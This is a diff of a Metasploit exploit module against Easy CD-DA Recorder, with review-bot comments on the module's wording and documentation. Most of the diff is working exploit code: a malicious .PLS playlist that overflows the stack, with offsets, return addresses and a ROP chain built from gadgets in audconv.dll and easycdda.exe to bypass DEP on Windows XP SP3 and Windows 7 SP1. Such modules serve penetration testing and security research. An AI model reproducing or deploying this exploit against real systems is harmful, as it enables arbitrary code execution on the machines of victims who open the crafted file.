diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
index a50f780a28..997edbfdda 100644
--- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
- include Msf::Exploit::Seh
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
+ 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow vulnerability in
 Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
- By persuading the victim to open a specially-crafted .PLS file, a remote
 attacker could execute arbitrary code on the system or cause
- the application to crash.
+ the application to crash. This modules has been tested successfully on
+ Windows XP SP3 and Windows 7 SP1.
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Payload' =>
 {
- 'BadChars' => "\x0a\x3d",
- 'Space' => 2559
+ 'DisableNops' => true,
+ 'BadChars' => "\x0a\x3d",
+ 'Space' => 2472,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 },
 'Targets' =>
 [
- [ 'Windows XP SP3 (DEP Bypass)',
+ [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
+ # easycdda.exe 3.0.114.0
+ # audconv.dll 7.0.815.0
 {
 'Offset' => 1108,
 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
 }
- ],
+ ]
 ],
 'Privileged' => false,
 'DisclosureDate' => 'Jun 7 2010',
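Review bot: Removing the `By persuading the victim ...` line leaves the description's next context line, `attacker could execute arbitrary code on the system or cause`, without a subject, and the added line says `This modules has been tested`. As far as the collapsed hunk shows, the `%q{ ... }` text now runs "...playlist entry. attacker could execute...", so the sentence needs its subject restored and the number fixed, e.g. `Easy CD-DA Recorder 2007, caused by a long string in a playlist entry. Opening a specially-crafted .PLS file leads to arbitrary code execution or a crash. This module has been tested successfully on`. The `Name` also dropped "2007" while the description still says "Easy CD-DA Recorder 2007", and the target comments added later in this diff pin easycdda.exe 3.0.114.0, so the product-version wording should agree in both places. The `initialize` method continues past the hunk.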
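Review bot: The tested-build comments `# easycdda.exe 3.0.114.0` and `# audconv.dll 7.0.815.0` are placed inside the Targets array where only a reader of the source sees them, while the target name the same hunk adds says only 'Windows XP SP3 / Windows 7 SP1'; since the `Ret` value is, per its own comment, an address in audconv.dll, the build it was taken from is part of the module's documented contract and belongs in the Description as well, e.g. `Tested against easycdda.exe 3.0.114.0 with audconv.dll 7.0.815.0 on Windows XP SP3 and Windows 7 SP1.` The comment on the new `PrependEncoder` line, `# Stack adjustment # add esp, -3500`, is two fragments; `# Stack adjustment: add esp, -3500` reads as one statement. The `initialize` call continues past the hunk.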
@@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
 return make_nops(4).unpack("V").first
 end
- def exploit
+ def rop_nops(n = 1)
+ # RETN (ROP NOP) [audconv.dll]
+ [0x1003d55d].pack('V') * n
+ end
- rop_nop =
- [
- 0x1003d55d # RETN (ROP NOP) [audconv.dll]
- ].flatten.pack('V*')
+ def exploit
 # ROP chain generated by mona.py - See corelan.be
 rop_gadgets =
@@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
 ].flatten.pack('V*')
- sploit = rand_text_alpha_upper(target['Offset'])
- sploit << generate_seh_record(target.ret)
- sploit << rand_text_alpha_upper(80)
- sploit << rop_nop
- sploit << rand_text_alpha_upper(4)
+ sploit = rop_nops(target['Offset'] / 4)
+ sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
+ sploit << [target.ret].pack("V")
+ sploit << rop_nops(22)
 sploit << rop_gadgets
 sploit << make_nops(4)
 sploit << payload.encoded
- sploit << rand_text_alpha_upper(10000)
+ sploit << rand_text_alpha_upper(10000) # make it crash
 # Create the file
 print_status("Creating '#{datastore['FILENAME']}' file ...")
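Review bot: The new `rop_nops` carries only a gadget-name comment; its contract (a count in, a packed byte string out) is not stated, and the `n = 1` default is not used by either call in the later hunk, which both pass a count. A short YARD header would make the method self-describing, e.g. `# Builds +n+ copies of the RETN gadget in audconv.dll, packed as little-endian 32-bit words.`, `# @param n [Integer] number of gadget copies`, `# @return [String] 4*n bytes`. The `exploit` method's body continues past the hunk.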